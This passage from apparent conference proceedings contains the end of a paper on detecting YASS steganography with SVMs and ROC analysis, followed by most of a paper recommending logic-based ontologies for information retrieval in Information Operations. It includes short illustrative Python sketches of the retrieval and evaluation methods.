In any predictive learning task, such as classification, both the model and the parameter estimation method should be selected in order to achieve a high level of performance of the learning machine. Recent approaches allow a wide class of models of varying complexity to be chosen; the task of learning then amounts to selecting the model of optimal complexity and estimating its parameters from training data (Cherkassy, 2002: 109-133; Lee and Lin, 2000). Within the SVM approach, the parameters to be chosen are usually (i) the penalty term C, which determines the trade-off between the complexity of the decision function and the number of misclassified training examples; (ii) the mapping function Φ; and (iii) the kernel function K such that K(x_i, x_j) = Φ(x_i)·Φ(x_j). In the case of the RBF kernel, the width, which implicitly defines the high-dimensional feature space, is the other parameter to be selected (Chang and Lin, 2001). Figures 2 and 3 give the model graphs obtained during training.
Figure 2: Model graph obtained during training of the SVM for YASS at block size 9, compression rates 50-50 and 12 coefficients used for embedding
Figure 3: Model graph obtained during training of the SVM for YASS at block size 14, compression rates 75-75 and 10 coefficients used for embedding
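Parameter selection of this kind is commonly organised as a grid search over (C, width). The sketch below shows only the search skeleton; the toy scoring function is a stand-in for cross-validated SVM accuracy and is not the authors' LIBSVM setup.

```python
import itertools

def grid_search(score_fn, Cs, gammas):
    # Evaluate every (C, gamma) pair and keep the best-scoring one;
    # score_fn stands in for cross-validated SVM accuracy.
    best = None
    for C, gamma in itertools.product(Cs, gammas):
        s = score_fn(C, gamma)
        if best is None or s > best[0]:
            best = (s, C, gamma)
    return best

# Toy scoring surface peaking at C=8, gamma=0.5 (illustration only).
def toy_score(C, gamma):
    return 1.0 - abs(C - 8) / 100 - abs(gamma - 0.5)

best = grid_search(toy_score, [1, 8, 64], [0.1, 0.5, 2.0])
```

In practice the grids are usually exponential (e.g. powers of 2 for both C and the RBF width), and each score is a cross-validation accuracy rather than a closed-form function.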
5.2 ROC curves<br />
An ROC curve is a graphical plot of sensitivity against 1 - specificity, i.e., of the fraction of true positives (TP) versus the fraction of false positives (FP). The point (0, 1) is the perfect classifier, since it classifies all positive and negative cases correctly. Thus an ideal system starts by identifying all the positive examples, so the curve rises to (0, 1) immediately, with a zero rate of false positives, and then continues along to (1, 1). Detection rates and false alarms were evaluated for the steganography data set, and the results obtained were used to plot the ROC curves. In each of these ROC plots, the x-axis is the false alarm rate, calculated as the percentage of cover images considered as steganograms; the y-axis is the detection rate, calculated as the percentage of steganograms detected. A data point in the upper left corner corresponds to optimal performance, i.e., a high detection rate with a low false alarm rate (Egan, 1975). Figures 4 and 5 give the ROC curves obtained during testing.
Figure 4: Receiver Operating Characteristic (ROC) curve obtained during steganalysis of YASS at block size 9, compression rates 50-50 and 12 coefficients used for embedding
Figure 5: Receiver Operating Characteristic (ROC) curve obtained during steganalysis of YASS at block size 14, compression rates 75-75 and 10 coefficients used for embedding
The accuracy of the test depends on how well it classifies the group being tested into 0 or 1. Accuracy is measured by the area under the ROC curve (AUC): an area of 1 represents a perfect test, while an area of 0.5 represents a worthless (chance-level) test. In our experiment, we obtained AUC values of 0.9998 and 0.9667, as shown in Figures 4 and 5.
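The ROC and AUC computations described above can be sketched directly; this is a generic implementation, not tied to the authors' data.

```python
def roc_points(scores, labels):
    # Sweep the decision threshold over the scores in descending order
    # and record (false positive rate, true positive rate) pairs.
    pairs = sorted(zip(scores, labels), reverse=True)
    P = sum(labels)
    N = len(labels) - P
    tp = fp = 0
    pts = [(0.0, 0.0)]
    for _, y in pairs:
        if y:
            tp += 1
        else:
            fp += 1
        pts.append((fp / N, tp / P))
    return pts

def auc(pts):
    # Trapezoidal area under the ROC curve.
    area = 0.0
    for (x0, y0), (x1, y1) in zip(pts, pts[1:]):
        area += (x1 - x0) * (y0 + y1) / 2
    return area
```

A perfect ranking (all steganograms scored above all covers) yields an AUC of 1.0, while a random ranking tends toward 0.5.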
6. Conclusion<br />
In this paper we propose a steganalysis scheme for YASS. The novelty of our method lies in estimating the image using the concept of motion estimation. Experimental results show that our method is able to detect YASS even at low embedding rates, and it detects YASS steganograms consistently with an accuracy above 99% at the 50-50 compression setting. In our approach the accuracy decreases as the block size increases, since fewer bits are embedded. As our methodology does not use any information about the steganographic scheme, it can be applied to any scheme.
References
Chang, C. C. and Lin, C. J. (2001), LIBSVM: a library for support vector machines, Department of Computer Science and Information Engineering, National Taiwan University.
Chen, C. and Shi, Y. Q. (2008) ‘JPEG image steganalysis utilizing both intrablock and interblock correlations’, IEEE International Symposium on Circuits and Systems, pp. 3029-3032.
Cherkassy, V. (2002) ‘Model complexity control and statistical learning theory’, Journal of Natural Computing, Vol. 1, pp. 109-133.
Egan, J.P. (1975), Signal detection theory and ROC analysis, New York: Academic Press.
Fridrich, J. (2004) ‘Feature-based steganalysis for JPEG images and its implications for future design of steganographic schemes’, Information Hiding, 6th International Workshop, LNCS 3200, pp. 67-81.
Kodovský, J., Pevný, T. and Fridrich, J. (2010) ‘Modern steganalysis can detect YASS’, Proceedings SPIE, Electronic Imaging, Security and Forensics of Multimedia XII, volume 7541, pp. 02-01–02-11.
Lee, J. H. and Lin, C. J. (2000), Automatic model selection for support vector machines, Technical Report, Department of Computer Science and Information Engineering, National Taiwan University.
Li, B., Shi, Y.Q. and Huang, J. (2008) ‘Steganalysis of YASS’, Proceedings of the 10th ACM Multimedia & Security Workshop, pp. 139-148.
Lyu, S. and Farid, H. (2002) ‘Detecting hidden messages using higher order statistics and support vector machines’, Information Hiding, 5th International Workshop, LNCS 2578, pp. 340-354.
Pevny, T. and Fridrich, J. (2007) ‘Merging Markov and DCT features for multi-class JPEG steganalysis’, Proc. of SPIE Electronic Imaging, Security, Steganography, and Watermarking of Multimedia Contents, volume 6505, pp. 650503-1-650503-13.
Pevný, T., Bas, P. and Fridrich, J. (2009) ‘Steganalysis by subtractive pixel adjacency matrix’, Proceedings of the 11th ACM Multimedia & Security Workshop, pp. 75-84.
Provos, N. (2001) ‘Defending against statistical steganalysis’, 10th USENIX Security Symposium, Washington DC, USA, pp. 24.
Sallee, P. (2005) ‘Model based methods for steganography and steganalysis’, Int. J. Image Graphics, 5(1): 167-190.
Sarkar, A., Solanki, K. and Manjunath, B. S. (2008) ‘Further study on YASS: Steganography based on randomized embedding to resist blind steganalysis’, Proceedings SPIE, Electronic Imaging, Security, Forensics, Steganography, and Watermarking of Multimedia Contents, volume 6819, pp. 16-31.
Shi, Y. Q., Chen, C. and Chen, W. (2006) ‘A Markov process based approach to effective attacking JPEG steganography’, Information Hiding, 8th International Workshop, volume 4437, pp. 249-264.
Solanki, K., Sarkar, A. and Manjunath, B. S. (2007) ‘YASS: Yet another steganographic scheme that resists blind steganalysis’, Proceedings of 9th Information Hiding Workshop, Saint Malo, France, volume 4567, pp. 16-31.
Torr, P.H.S. and Zisserman, A. (1999) ‘Feature Based Methods for Structure and Motion Estimation’, ICCV Workshop on Vision Algorithms, pp. 278-294.
Westfeld, A. (2001) ‘High capacity despite better steganalysis (F5 – a steganographic algorithm)’, Information Hiding, 4th International Workshop, LNCS 2137, pp. 289-302.
Developing a Knowledge System for Information<br />
Operations<br />
Louise Leenen, Ronell Alberts, Katarina Britz, Aurona Gerber and Thomas<br />
Meyer<br />
Council for Scientific and Industrial Research, Pretoria, South Africa<br />
lleenen@csir.co.za<br />
ralberts@csir.co.za<br />
abritz@csir.co.za<br />
agerber@csir.co.za<br />
tmeyer@csir.co.za<br />
Abstract: In this paper we describe a research project to develop an optimal information retrieval system in an<br />
Information Operations domain. Information Operations is the application and management of information to gain<br />
an advantage over an opponent and to defend one’s own interests. Corporations, governments, and military<br />
forces are facing increasing exposure to strategic information-based actions. Most national defence and security<br />
organisations regard Information Operations as both a defensive and offensive tool, and some commercial<br />
institutions are also starting to recognise the value of Information Operations. An optimal information retrieval<br />
system should have the capability to extract relevant and reasonably complete information from different<br />
electronic data sources which should decrease information overload. Information should be classified in a way<br />
such that it can be searched and extracted effectively. The authors of this paper have completed an initial phase<br />
in the investigation and design of a knowledge system that can be used to extract relevant and complete<br />
knowledge for the planning and execution of Information Operations. During this initial phase of the project, we<br />
performed a needs analysis and a problem analysis, and our main finding is a recommendation to use logic-based ontologies: this approach has the advantage of unambiguous semantics, facilitates intelligent search, provides an optimal trade-off between expressivity and complexity, and yields optimal recall of information. The risk of adopting this technology is its status as an emerging technology, and we therefore include recommendations for the development of a prototype system.
Keywords: information operations, knowledge representation, ontology, query language<br />
1. Introduction<br />
Businesses, governments, and military forces are increasingly reliant on the effective management of<br />
vast sources of electronic information. The type of information can be documents, images, maps, or<br />
other formats. These data sources can be used in Information Operations (IO).<br />
McCrohan (McCrohan 1998) defines IO as “actions taken to create an information gap in which we<br />
possess a superior understanding of a potential adversary’s political, economic, military, and<br />
social/cultural strengths, vulnerabilities, and interdependencies than our adversary possesses of us”.<br />
All institutions that rely on information are facing increasing exposure to strategic information-based<br />
actions, and need to consider systems security. Most national defence and security organisations<br />
regard IO as both a defensive and an offensive tool, and some commercial institutions are starting to<br />
recognise the value of IO. In any competitive environment, an institution has to protect its strategies from competitors and gather information regarding its competitors’ objectives and plans. IO includes competitive intelligence, security against the efforts of competitors, the use of competitive deception, and the use of psychological operations (McCrohan 1998).
The aim of an efficient information retrieval system is to support institutions in planning IO. Information<br />
has to be presented for processing by computers in a knowledge system such that information can be<br />
retrieved and conclusions can be drawn from existing knowledge. Information should be classified in such a way that it can be searched and extracted effectively.
We present the main decisions required in the investigation and design of a knowledge system that<br />
can be used to extract relevant and complete knowledge for the planning and execution of IO and<br />
give a motivation for our main recommendation: the use of logic-based ontologies in a knowledge<br />
system for IO.<br />
2. Intelligent knowledge retrieval methods and technologies<br />
We describe appropriate technologies for intelligent search and retrieval of information over a range<br />
of different sources and types. The operative word here is intelligent, focussing on methods that will<br />
ensure maximum recall with a high level of fidelity. In other words, the aim is to get as close as is<br />
currently feasible to the ideal situation in which all and only relevant information will be returned. In<br />
order to do so, it is necessary to be more precise in deciding what it means for information to be<br />
relevant. The most important step in this direction is the distinction between syntactic and semantic<br />
relevance.<br />
Syntactic relevance refers to search based on the syntactic structure of the entities to be searched,<br />
while semantic relevance is concerned with the underlying meaning of the syntactic objects being<br />
represented. Search based on syntactic relevance can be better or worse depending on some<br />
flexibility built into the search mechanisms, but this provides only for a very limited and restricted form<br />
of intelligence. To be seen as performing intelligent search in any true sense of the word, it is<br />
necessary to make use of some version of semantic relevance.<br />
The basic assumption is that information can be accessed electronically. Information in this sense is<br />
defined very broadly: it can refer to data entries stored in database systems, or in more sophisticated<br />
structures. It can also refer to electronic documents, or an image in any of the known formats, or any<br />
one of the other numerous resources that can be stored electronically. The main reason why it is<br />
possible to allow for such a broad definition is that the methods detailed in this survey allow for a<br />
clean separation between information, the structures employed to store the information, and the<br />
methods used to access the information.<br />
2.1 Query languages<br />
2.1.1 Boolean combinations of keywords<br />
Keyword search is an established technology (Kalyanpur et al. 2006). In its simplest form, a list of keywords is used to locate information containing all keywords in the list. More flexible keyword searches can be performed using Boolean operators such as AND, OR and NOT. This kind of query language cannot be used on database-style structures. A second difficulty is that searches become complex when there are large numbers of keyword hits.
2.1.2 Logic-based query languages<br />
The use of logic-based languages is pervasive in database systems. It has its origins in languages<br />
such as SQL and later extensions such as the query languages for Datalog (Ceri et al. 1989) and<br />
logic programming (Lloyd 1987). These languages are all fragments of first-order logic (Ben-Ari 2008).<br />
In addition to the Boolean operators discussed in the previous section, these query languages also allow for the use of variables, existential quantification (exists), universal quantification (for all), and function symbols, as well as combinations of these constructs in a manner reminiscent of the recursive definition in the previous section. This allows us to express complex queries such as:
“Find all countries in Africa with a per capita income of at most $X, and with a military<br />
style government, or where there is no adherence to human rights”.<br />
The main advantages of these types of query languages are that they allow for much more complex queries, can be used to express queries about concepts as well as individuals, and are applicable to information contained in database-style structures as well as electronic documents. However, the processing of such queries can be very expensive, and its cost is directly related to the complexity of the queries. It is therefore good practice to limit the expressivity of a chosen query language to precisely what is necessary, in order to maximise the efficiency of query processing.
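For instance, the sample query above can be written as a first-order-style condition over structured records (the data and field names below are invented for illustration):

```python
# Hypothetical country records; the query from the text becomes a
# conjunction/disjunction of conditions over them.
countries = [
    {"name": "A", "region": "Africa", "income": 800,
     "government": "military", "human_rights": False},
    {"name": "B", "region": "Africa", "income": 3000,
     "government": "civilian", "human_rights": True},
    {"name": "C", "region": "Europe", "income": 700,
     "government": "military", "human_rights": False},
]

X = 1000  # per capita income threshold

result = [c["name"] for c in countries
          if c["region"] == "Africa" and c["income"] <= X
          and (c["government"] == "military" or not c["human_rights"])]
```

The same condition could equally be phrased in SQL or Datalog; the point is that quantified, compositional conditions go beyond what Boolean keyword lists can express.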
2.2 Information types<br />
It is useful to assume that information is tagged with the relevant components to be matched with queries. This assumption enables us to reduce the original question to a decision of how a piece of information should be tagged. A tag is a keyword associated with a piece of information; its purpose is to describe an item and to enable an electronic search to find it.
We distinguish between using text or keywords as tags, and between information contained in database-style structures and electronic documents viewed as information.
2.2.1 Text as tags<br />
In the case of information contained in database-style structures, the only practical option is to view<br />
the information itself as its own tag. In the case of electronic documents, the simplest form of tagging<br />
is the brute force approach of using the raw text contained in a document. In a sense the document is<br />
tagged with all of its textual content. The advantage of such an approach is that it is relatively simple<br />
to implement, but this simplicity is associated with high levels of inaccuracy. In particular, this<br />
approach is bound to lead to many false positives and it does not guarantee that all relevant<br />
documents will be located. The main problem is that this is a purely syntactic approach. There is no<br />
attempt to tag documents with keywords related to the meaning of the document, and there is<br />
therefore no guarantee that the tags will be truly relevant to the content of the document.<br />
2.2.2 Keywords as tags<br />
In contrast with using text as tags, the practice of tagging information with appropriate keywords<br />
allows for a much more flexible approach. The goal is to tag documents with keywords that are clearly<br />
relevant to the meaning of the document, ideally to tag documents with all and only the relevant<br />
keywords. The primary issue to be resolved here is how to decide on the relevant keywords.
Tagging can take one of three forms: Manual tagging, semi-automated tagging, or automated tagging<br />
(Buitelaar, Cimiano 2008; Buitelaar, Magnini 2005). Current techniques are relatively good at picking<br />
out keywords related to concepts and individuals, but much work still needs to be done regarding<br />
keywords related to relationships between concepts or individuals.<br />
Manual tagging is a good starting point; however, using only manual tagging is usually not feasible,
due to factors such as time constraints and the availability of domain experts. A better approach is to<br />
interleave processes for manual, semi-automated and automated tagging of documents. Automated<br />
tagging is faster but not as accurate, whereas semi-automated tagging provides better results, but is<br />
more time consuming to set up. Keep in mind that the results obtained even from manual tagging are<br />
only as good as the knowledge applied by the person(s) performing the tagging.<br />
The good news is that tagging lends itself to an incremental approach: one can start with a fairly coarse-grained tagging methodology and refine it over time.
2.3 Information retrieval methods<br />
2.3.1 Direct retrieval<br />
Direct retrieval is concerned with methods for extracting information stored explicitly in as efficient a<br />
manner as possible. This is the kind of retrieval based on indexing techniques that one would obtain<br />
from traditional database systems and from keyword searches based on syntactic relevance (Gray,<br />
Reuter 1992; Kroenke 1997). In the case of direct document retrieval, keywords in a query are<br />
identified and are matched directly with the keywords used to tag the document.<br />
Direct retrieval techniques are firmly established, and are able to deal efficiently with huge amounts of<br />
information. The only drawback is the restriction on the type of information to be extracted: it has to be<br />
stored explicitly in some form.<br />
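The direct matching of query keywords against document tags described above is conventionally implemented with an inverted index. A minimal sketch, with document ids and tags invented for illustration:

```python
from collections import defaultdict

def build_index(tagged_docs):
    """Build an inverted index mapping each tag keyword to the set of
    document ids carrying that tag."""
    index = defaultdict(set)
    for doc_id, tags in tagged_docs.items():
        for tag in tags:
            index[tag].add(doc_id)
    return index

def direct_retrieve(index, query_keywords):
    """Direct retrieval: documents whose tags match ALL query keywords."""
    sets = [index.get(kw, set()) for kw in query_keywords]
    return set.intersection(*sets) if sets else set()

docs = {"d1": {"voip", "forensics"}, "d2": {"voip", "sip"}, "d3": {"ontology"}}
idx = build_index(docs)
print(direct_retrieve(idx, ["voip"]))         # d1 and d2
print(direct_retrieve(idx, ["voip", "sip"]))  # d2 only
```

The index lookup is what makes direct retrieval efficient even over very large collections, at the cost of only finding what is stored explicitly.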
2.3.2 Indirect retrieval<br />
A more sophisticated approach is to employ some kind of indirect retrieval where the task is to match<br />
the keywords identified in the query not just with the exact keywords with which a document is tagged,<br />
but also with related keywords. The hard part is to determine what constitutes being related. Standard<br />
approaches to indirect document retrieval are mostly still syntax-based:<br />
The use of synonyms using resources such as WordNet (http://wordnet.princeton.edu/)<br />
(Fellbaum 1998).<br />
153<br />
Louise Leenen et al.<br />
Lemmatisation, the process of grouping together the different inflected forms of a word so they<br />
can be analysed as a single item (Brown 1993). For example, the verb “to walk” may appear as<br />
“walk”, “walked”, “walks”, “walking”. The base form, “walk”, is called the lemma of the word.<br />
Stemming, which is closely related to lemmatisation but operates on a single word without<br />
contextual information. Related words should map to the same stem, but the stem does not have<br />
to be a valid root.<br />
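These syntax-based expansions can be sketched as follows, with a tiny hand-rolled synonym table standing in for WordNet and a naive suffix stripper standing in for a real stemmer; both are illustrative assumptions, not the tools named above:

```python
# A toy synonym table stands in for WordNet; a naive suffix stripper
# stands in for a proper stemming algorithm.
SYNONYMS = {"attack": {"assault", "strike"}, "car": {"automobile"}}

def stem(word):
    """Strip a few common suffixes; the stem need not be a valid root."""
    for suffix in ("ing", "ed", "s"):
        if word.endswith(suffix) and len(word) > len(suffix) + 2:
            return word[: -len(suffix)]
    return word

def expand_query(keywords):
    """Indirect retrieval: match on stems and synonyms, not only on the
    exact keywords of the query."""
    expanded = set()
    for kw in keywords:
        base = stem(kw.lower())
        expanded.add(base)
        expanded |= SYNONYMS.get(base, set())
    return expanded

print(expand_query(["attacks"]))  # stem plus its synonyms
```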
A more nuanced version of indirect document retrieval involves structures able to capture and<br />
represent sophisticated relationships between entities. The more sophisticated version of indirect<br />
retrieval employs methods for performing inference of some kind. Indirect retrieval also includes<br />
information that can be inferred implicitly from what is stored explicitly.<br />
The most appropriate technology able to deal with indirect information retrieval is that based on<br />
ontologies (Staab, Studer 2004). The following definition of an ontology is taken from Wikipedia<br />
(http://en.wikipedia.org/wiki/Ontology_(information_science)): “an ontology is a formal representation<br />
of a set of concepts within a domain and the relationships between those concepts. It is used to<br />
reason about the properties of that domain, and may be used to define the domain”.<br />
In addition to facilitating the hierarchical structuring of information from a domain of discourse,<br />
ontologies also provide the means to impose a whole variety of other constraints, which makes it a<br />
very powerful method for representing concepts, individuals, and the relationships between them. The<br />
use of logic-based ontologies is particularly apt, since it provides the means for employing powerful<br />
and efficient mechanisms for performing inference.<br />
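A minimal illustration of the kind of inference a logic-based ontology enables: with explicit subclass ("is-a") assertions, a query for a general concept also retrieves documents tagged only with more specific concepts. The mini-ontology below is hypothetical:

```python
# Hypothetical mini-ontology: explicit "is-a" (subclass) assertions.
IS_A = {"sip_attack": "voip_attack", "voip_attack": "network_attack"}

def subsumers(concept):
    """Every concept subsuming `concept`, via the transitive closure of is-a."""
    result = {concept}
    while concept in IS_A:
        concept = IS_A[concept]
        result.add(concept)
    return result

docs = {"d1": {"sip_attack"}, "d2": {"network_attack"}}

def ontology_retrieve(query_concept):
    """A document matches when any of its tags is subsumed by the query
    concept, so both explicit and inferred matches are found."""
    return {d for d, tags in docs.items()
            if any(query_concept in subsumers(t) for t in tags)}

print(ontology_retrieve("network_attack"))  # d1 is found only by inference
```

A DL reasoner performs this subsumption computation (and much more) over far richer constraint languages than a bare subclass chain.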
2.4 Ontologies and ontology-based engineering<br />
In the past fifteen years, advances in technology have ensured that access to vast amounts of data is<br />
no longer a significant problem. Paradoxically, this abundance of data has led to a problem of<br />
information overload, making it increasingly difficult to locate relevant information. The technology of<br />
choice at present is keyword search, although many argue that this is already delivering diminishing<br />
returns, as Figure 1 below by Nova Spivack (Spivack 2007) indicates. Spivack illustrates how keyword<br />
search is becoming less effective as the Web increases in size. The broken line shows that the<br />
productivity of keyword search has reached a plateau and its efficiency will decrease in future, while<br />
the dotted line plots the expected growth of the Web.<br />
Any satisfactory solution to this problem will have to involve ways of making information machine-processable,<br />
a task which is only possible if machines have better access to the semantics of the<br />
information. It is here that ontologies play a crucial role. Roughly speaking, an ontology structures<br />
information in ways that are appropriate for a specific application domain, and in doing so, provides a<br />
way to attach meaning to the terms and relations used in describing the domain. A more formal, and<br />
widely used definition, is that of Grüber (Grüber 1993) who defines an ontology as a formal<br />
specification of a conceptualisation.<br />
The importance of this technology is evidenced by the growing use of ontologies in a variety of<br />
application areas, and is in line with the view of ontologies as the emerging technology driving the<br />
Semantic Web initiative (Berners-Lee et al. 2001). The construction and maintenance of ontologies<br />
greatly depend on the availability of ontology languages equipped with a well-defined semantics and<br />
powerful reasoning tools. Fortunately there already exists a class of logics, called Description Logics<br />
(DLs), that provide for both, and are therefore ideal candidates for ontology languages (Baader et al.<br />
2003).<br />
The need for sophisticated ontology languages was already clear fifteen years ago, but at that time,<br />
there was a fundamental mismatch between the expressive power and the efficiency of reasoning that<br />
DL systems provided, and the expressivity and the large knowledge bases that ontologists needed.<br />
Through the basic research in DLs of the last fifteen years, this gap between the needs of ontologists<br />
and the systems that DL researchers provide has finally become narrow enough to build stable<br />
bridges. In fact, the web ontology language OWL 2.0, which was accorded the status of a World Wide<br />
Web Consortium (W3C) recommendation in 2009, and is therefore the official Semantic Web ontology<br />
language, is based on an expressive DL (http://www.w3.org/TR/owl2-overview/).<br />
There is growing interest in the use of ontologies and related semantic technologies in a wide variety<br />
of application domains. Arguably the most successful application area in this regard is the biomedical<br />
field (Hahn, Schulz 2007; Wolstencroft et al. 2005 ). Some of the biggest breakthroughs can be traced<br />
back to the pioneering work of Horrocks (Horrocks 1997) who developed algorithms specifically<br />
tailored for medical applications. Recent advances have made it possible to perform standard<br />
reasoning tasks on large-scale medical ontologies such as SNOMED CT - an ontology with more than<br />
300 000 concepts and more than a million semantic relationships - in less than half an hour; a feat<br />
that would have provoked disbelief ten years ago (Suntisrivaraporn et al. 2007). However, a number<br />
of obstacles still remain before the use of ontologies can be regarded as having reached the status of<br />
an established technology: mainly these are issues relating to conceptual modeling and data usage.<br />
Figure 1: Productivity of keyword search<br />
2.4.1 Conceptual modeling<br />
There are currently no firmly established conceptual modelling methodologies for ontology<br />
engineering. Although a variety of tools exist for ontology construction and maintenance (Kalyanpur et<br />
al. 2006; Sirin et al. 2007; Protégé 2009) they remain accessible mainly to those with specialised<br />
knowledge about the theory of ontologies. One way of dealing with this problem is to design ontology<br />
languages that are as close to natural language as possible, while still retaining the unambiguous<br />
semantics of a formal language (Schwitter et al. 2007). A related approach is to use unstructured text<br />
to automatically identify concepts and relationships in application domains, and in doing so contribute<br />
to the semi-automated construction of ontologies (Buitelaar, Cimiano 2008).<br />
Another major obstacle is that, while most tools for ontology construction and maintenance assume a<br />
static ontology, the reality is that ontologies are dynamic entities, continually changing over time for a<br />
variety of reasons. This has long been identified as a problem, and ontology dynamics is currently<br />
seen as an important research topic (Baader et al. 2005; Lee et al. 2006).<br />
2.4.2 Data usage<br />
Assuming that the problems relating to conceptual modeling have been solved, and that it is possible<br />
to construct and maintain high-quality ontologies, a number of stumbling blocks related to data usage<br />
still remain.<br />
The main problem is that most available data are currently in the form of unstructured or semi-structured<br />
text, or can be found in traditional relational database systems. The rich conceptual<br />
structures provided by ontologies are therefore of little use unless ways can be found to automate, or<br />
semi-automate, the process of populating ontologies with this data. Regarding data in textual form,<br />
there have been some recent attempts to perform semi-automated instantiation of ontologies from text<br />
(Buitelaar, Cimiano 2008; Williams, Hunter 2007). With regards to the data found in database<br />
systems, it is necessary to employ data coupling - finding ways of linking the data residing in<br />
database systems to the ontologies placed on top of such systems (Calvanese et al. 2006). This<br />
challenge is currently being met by tools for Ontology Based Data Access (OBDA) (Rodriguez-Muro<br />
et al. 2008).<br />
Once an ontology is populated, it becomes possible to use it as a sophisticated data repository to<br />
which complex queries can be posed, at least in principle. In practice, at least two challenges remain.<br />
The first is to perform query answering efficiently, a topic of ongoing research (Calvanese et al. 2007).<br />
The second is to go beyond purely deductive reasoning to answer queries and to be more proactive.<br />
A good example of this type of reasoning occurs during medical diagnosis, which is an instance of a<br />
form of reasoning technically known as abduction (Elsenbroich et al. 2007).<br />
2.5 Tools for user support<br />
There is a danger that the complexity of the techniques discussed above will pose a barrier to their<br />
general uptake. Most techniques require some level of familiarity with technical issues such as<br />
formal logic languages, which can be disconcerting for the more casual user. We discuss two classes<br />
of methods used to bridge the gap between users and the technology.<br />
2.5.1 Controlled natural language<br />
A controlled natural language is a suitable fragment of a natural language, usually obtained by<br />
restricting the grammar and vocabulary. This is done primarily to ensure that there is no ambiguity in<br />
the interpretation. It can also assist with a reduction in complexity. Controlled natural languages can<br />
usually be mapped to existing formal languages, typically a fragment of first-order logic.<br />
For our purposes the translation will be to a suitable DL used to represent ontologies. Because of this<br />
mapping, controlled natural languages have a formal semantics, making them suitable as knowledge<br />
representation languages, able to support inference tasks such as query answering. The advantage<br />
of using controlled natural languages instead of their logic counterparts is that it appears to the user<br />
as if a natural language is being used. Work on controlled natural languages most relevant for logic-based<br />
ontologies includes the Manchester OWL Syntax (Horrocks et al. 2006), Sydney OWL Syntax (SOS)<br />
(Schwitter et al. 2007), and the Rabbit language (Hart et al. 2008).<br />
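The mapping from controlled natural language to a formal language can be sketched with a single sentence pattern; real systems such as SOS or Rabbit cover a far richer grammar. This toy parser and its pattern are our own illustration:

```python
import re

def parse_cnl(sentence):
    """Map a controlled-English sentence to a subsumption axiom (A is
    subsumed by B). Only 'Every A is a/an B.' is supported in this sketch."""
    m = re.fullmatch(r"Every (\w+) is an? (\w+)\.", sentence)
    if not m:
        raise ValueError("sentence outside the controlled fragment")
    return (m.group(1), m.group(2))  # (subclass, superclass)

print(parse_cnl("Every rootkit is a malware."))  # ('rootkit', 'malware')
```

Because the grammar is restricted, each accepted sentence has exactly one interpretation, which is the point of controlling the language.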
2.5.2 Contextual navigation<br />
This subsection is concerned with the principles of the design and development of an intelligent query<br />
interface (Catarci et al. 2004). The interface is intended to support users in formulating queries which<br />
best capture their specific information needs. The distinctive part of this approach is the use of an<br />
ontology as the support for the intelligence contained in the query interface. The user can exploit the<br />
vocabulary in the ontology to formulate the query. Using the information contained in the ontology, the<br />
system is able to guide the user to express their intended query more precisely. Queries can be<br />
specified through an iterative refinement process supported by the ontology through contextual<br />
navigation. In addition, users may discover new information about the domain without explicit<br />
querying, but through the subparts of a query, using classification. Work on contextual navigation is<br />
not restricted to logic-based ontology languages, but it does depend on an underlying knowledge<br />
representation language with an associated formal reasoner. In the context of ontologies, it has led to<br />
the development of a query tool as part of the European Union funded SEWASIE project (SEmantic<br />
Webs and AgentS in Integrated Economies) (http://www.sewasie.org/).<br />
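The iterative refinement loop described above can be sketched as follows, with a hypothetical concept hierarchy supplying the narrower terms the interface would offer at each step:

```python
# Hypothetical concept hierarchy driving an intelligent query interface.
SUBCLASSES = {
    "attack": ["denial_of_service", "interception"],
    "interception": ["wiretap", "traffic_mirroring"],
}

def refine(concept):
    """Contextual navigation: offer the narrower concepts the user may
    pick to make the current query more precise."""
    return SUBCLASSES.get(concept, [])

query = ["attack"]
options = refine(query[-1])
print(options)            # narrower options for 'attack'
query.append(options[1])  # the user picks 'interception'
print(refine(query[-1]))  # narrower options again, one level down
```

A real system such as the SEWASIE query tool additionally uses the reasoner to classify the partial query, so the offered refinements are always consistent with what the user has selected so far.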
3. Research methodology<br />
We first conducted a needs analysis with our client with the aim of identifying their expectations and<br />
requirements, followed by a problem analysis where the client’s domain was studied and<br />
recommendations in terms of the most appropriate technologies for their applications were made.<br />
3.1 Needs analysis<br />
Needs analysis is an interactive process with the aim of extracting information from the client to<br />
understand their needs and expectations. It involves asking the client specific questions and<br />
recording and documenting their responses. Usually several interactions are required before this<br />
process is completed.<br />
The type of questions that were posed to our client can broadly be defined as:<br />
What is the reality of your domain?<br />
What do you do?<br />
What are the challenges you experience?<br />
What are your expectations from an information operation?<br />
The aim of these questions is to identify the type of IO the client wants to execute, the range of<br />
required information sources and how information should be interpreted. It should also point to the<br />
type of information repositories that will be needed, and how they should be populated and updated.<br />
As a result we compiled an extensive set of derived questions. These questions depict the scope of<br />
information required by our client for an operation.<br />
3.2 Problem analysis<br />
In this phase we analysed the various methodologies and technologies available for an appropriate<br />
knowledge representation system for the client’s domain. A basic assumption is that all information<br />
can be accessed electronically and includes documents, images or maps, and data stored in<br />
database systems, or in more sophisticated structures.<br />
The following three primary questions were applied to the client’s domain:<br />
In which way will a user extract information, i.e. which query language is to be used?<br />
How will the type of information to be extracted be matched with the query?<br />
Which method will be used to retrieve the information contained in the query from the information<br />
repository?<br />
A formal problem statement was written that includes strategic long term direction and objectives.<br />
3.3 Findings<br />
The main recommendation is that a logic-based ontology is to be used as the underlying technology<br />
for the retrieval system. The adoption of logic-based ontologies as the underlying formalism for a<br />
knowledge representation system has a number of advantages.<br />
The semantics of such an ontology is unambiguous;<br />
it facilitates intelligent search;<br />
it provides an optimal tradeoff between expressivity and complexity; and<br />
it can yield optimal recall of information.<br />
The risk of adopting this technology is its status as an emerging technology. Its impressive progress in<br />
the biomedical domain lends strong support for its adoption in the IO domain, but there are presently<br />
no off-the-shelf ontologies available for IO.<br />
The development of such an ontology that is both reliable and complete is a highly complex research<br />
endeavour. With this in mind, we recommend an incremental approach to the adoption of this<br />
technology in order to realise the long term strategic objectives outlined earlier.<br />
The developmental recommendations for a prototype system are:<br />
Define a suitable sub-domain for initial development. Our client’s domain is vast and complex.<br />
The recommendation is to start with a smaller, focused domain.<br />
The documents in the domain should be tagged. The choice of tags will depend on the ontology<br />
and the concepts used in existing information sources.<br />
An ontology-based search facility should be developed.<br />
An appropriate query language should be decided on in conjunction with a suitable user interface,<br />
which may involve controlled natural language or contextual navigation, or both.<br />
The evaluation of a prototype system will determine the extension of the system into a comprehensive<br />
knowledge system.<br />
4. Conclusion<br />
In this paper we have focused on the technologies relevant for intelligent information retrieval for<br />
Information Operations. Conceptually, the survey is decomposed into three parts:<br />
Choices for a suitable query language;<br />
Type of information to be extracted;<br />
Methods employed for information retrieval.<br />
Supplementary to this is a discussion on ontologies, as well as on tools for supporting users of<br />
